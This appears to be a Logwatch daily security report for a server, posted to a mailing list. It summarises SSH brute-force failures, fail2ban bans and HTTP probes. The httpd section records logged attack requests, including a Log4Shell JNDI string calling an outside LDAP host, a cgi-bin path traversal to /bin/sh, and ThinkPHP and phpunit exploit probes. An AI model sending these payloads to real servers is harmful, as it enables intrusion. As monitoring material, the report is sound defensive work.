04:42
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Mon Dec 27 04:42:05 2021
Date Range Processed: yesterday
( 2021-Dec-26 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 30:36 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
A total of 8 sites probed the server
113.69.117.20
139.162.145.250
165.232.189.212
167.71.102.95
172.104.131.24
205.185.124.100
61.219.11.151
64.227.99.233
Requests with error response codes
400 Bad Request
null: 9 Time(s)
mstshash=Domain: 4 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 2 Time(s)
/w00tw00t.at.ISC.SANS.DFind:): 2 Time(s)
/: 1 Time(s)
/.env: 1 Time(s)
/manager/text/list: 1 Time(s)
/sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/: 1 Time(s)
mstshash=Administr: 1 Time(s)
500 Internal Server Error
/.env: 66 Time(s)
/: 15 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 4 Time(s)
/robots.txt: 3 Time(s)
/index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 2 Time(s)
/?XDEBUG_SESSION_START=phpstorm: 1 Time(s)
/?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 1 Time(s)
/Autodiscover/Autodiscover.xml: 1 Time(s)
/actuator/health: 1 Time(s)
/console/: 1 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 1 Time(s)
/mifs/.;/services/LogService: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
502 Bad Gateway
/D1lk7Eb3Squ7uGiIXiErNg/pdf: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (175.24.30.100): 35 Time(s)
root (118.24.120.41): 32 Time(s)
root (27.115.50.114): 31 Time(s)
root (180.76.246.21): 28 Time(s)
unknown (42.193.157.80): 23 Time(s)
unknown (118.24.120.41): 18 Time(s)
unknown (180.76.246.21): 18 Time(s)
root (191.209.88.62): 17 Time(s)
unknown (175.24.30.100): 15 Time(s)
unknown (27.115.50.114): 13 Time(s)
root (123.156.225.58): 12 Time(s)
root (210.212.237.67): 12 Time(s)
unknown (123.156.225.58): 11 Time(s)
root (dsl51b6f8c1.fixip.t-online.hu): 10 Time(s)
unknown (191.209.88.62): 10 Time(s)
root (42.193.157.80): 7 Time(s)
unknown (210.212.237.67): 7 Time(s)
root (124.79.241.33): 6 Time(s)
root (185.243.218.50): 6 Time(s)
root (45.114.192.154): 6 Time(s)
root (45.153.160.131): 6 Time(s)
root (b9c17f99.host.njalla.net): 6 Time(s)
root (exitrelay06.medvideos-tor.org): 6 Time(s)
root (exitrelay25.medvideos-tor.org): 6 Time(s)
root (exitrelay54.medvideos-tor.org): 6 Time(s)
root (h-213-164-206-127.na.cust.bahnhof.se): 6 Time(s)
root (lux2.tor-exit-node.net): 6 Time(s)
root (tor-exit.laukalfur.relays.yana.moe): 6 Time(s)
root (tor.exit.mia1.plithismos.net): 6 Time(s)
root (torsrv0.snydernet.net): 5 Time(s)
unknown (45.114.192.154): 3 Time(s)
root (122.51.53.176): 2 Time(s)
root (128.199.100.105): 2 Time(s)
root (198.23.233.28): 2 Time(s)
root (60.171.208.199): 2 Time(s)
unknown (181.117.202.166): 2 Time(s)
unknown (182.31.191.2): 2 Time(s)
unknown (dsl51b6f8c1.fixip.t-online.hu): 2 Time(s)
unknown (ec2-13-127-252-107.ap-south-1.compute.amazonaws.com): 2 Time(s)
unknown (h53-ipv4-45-94-0.mynet.it): 2 Time(s)
unknown (s0106105611be4591.vf.shawcable.net): 2 Time(s)
backup (42.193.157.80): 1 Time(s)
news (42.193.157.80): 1 Time(s)
root (110.78.141.221): 1 Time(s)
root (167.99.88.94): 1 Time(s)
root (46.161.27.162): 1 Time(s)
root (ec2-13-127-252-107.ap-south-1.compute.amazonaws.com): 1 Time(s)
unknown (122.51.53.176): 1 Time(s)
unknown (64.227.188.173): 1 Time(s)
unknown (kalium.0x49.net): 1 Time(s)
unknown (ltlkwlb.cn): 1 Time(s)
Invalid Users:
Unknown Account: 134 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
1 Miscellaneous warnings
9.553K Bytes accepted 9,782
9.553K Bytes sent via SMTP 9,782
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
195 Connections
4 Connections lost (inbound)
195 Disconnections
1 Removed from queue
1 Sent via SMTP
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin
------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End
-------------------------
--------------------- SSHD Begin ------------------------
Disconnecting after too many authentication failures for user:
root : 11 Time(s)
Failed logins from:
13.127.252.107 (ec2-13-127-252-107.ap-south-1.compute.amazonaws.com): 1 time
27.115.50.114: 31 times
42.193.157.80: 9 times
45.61.184.239 (tor.exit.mia1.plithismos.net): 6 times
45.61.186.171 (exitrelay54.medvideos-tor.org): 6 times
45.114.192.154 (154-192-114-45.intechonline.net): 6 times
45.153.160.131: 6 times
46.161.27.162: 1 time
60.171.208.199: 2 times
81.182.248.193 (dsl51B6F8C1.fixip.t-online.hu): 10 times
107.189.8.65 (lux2.tor-exit-node.net): 6 times
107.189.14.119 (exitrelay06.medvideos-tor.org): 6 times
110.78.141.221: 1 time
118.24.120.41: 32 times
122.51.53.176: 2 times
123.156.225.58: 12 times
124.79.241.33 (33.241.79.124.broad.xw.sh.dynamic.163data.com.cn): 6 times
128.199.100.105: 2 times
167.99.88.94: 1 time
175.24.30.100: 35 times
180.76.246.21: 28 times
185.100.86.154 (torsrv0.snydernet.net): 5 times
185.112.144.68 (tor-exit.laukalfur.relays.yana.moe): 6 times
185.193.127.153 (b9c17f99.host.njalla.net): 6 times
185.243.218.50 (tor.terrahost.no): 6 times
191.209.88.62 (191-209-88-62.user.vivozap.com.br): 17 times
198.23.233.28 (198-23-233-28-host.colocrossing.com): 2 times
209.141.36.177 (exitrelay25.medvideos-tor.org): 6 times
210.212.237.67: 12 times
213.164.206.127 (h-213-164-206-127.NA.cust.bahnhof.se): 6 times
Illegal users from:
2001:470:1:c84::27: 1 time
undef: 101 times
13.127.252.107 (ec2-13-127-252-107.ap-south-1.compute.amazonaws.com): 2 times
27.115.50.114: 13 times
42.193.157.80: 23 times
45.94.0.53 (h53-ipv4-45-94-0.mynet.it): 2 times
45.114.192.154 (154-192-114-45.intechonline.net): 3 times
64.227.188.173 (app.pashushala.com): 1 time
70.68.245.235 (S0106105611be4591.vf.shawcable.net): 2 times
81.182.248.193 (dsl51B6F8C1.fixip.t-online.hu): 2 times
118.24.120.41: 18 times
122.51.53.176: 1 time
123.156.225.58: 11 times
175.24.30.100: 15 times
180.76.246.21: 18 times
181.117.202.166 (host166.181-117-202.telmex.net.ar): 2 times
182.31.191.2: 2 times
191.209.88.62 (191-209-88-62.user.vivozap.com.br): 10 times
198.98.53.212 (kalium.0x49.net): 1 time
205.185.125.184 (ltlkwlb.cn): 1 time
210.212.237.67: 7 times
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
1392
days inactive
1392
days old
0 comments
1 participants
participants (1)
-
root@zapf.in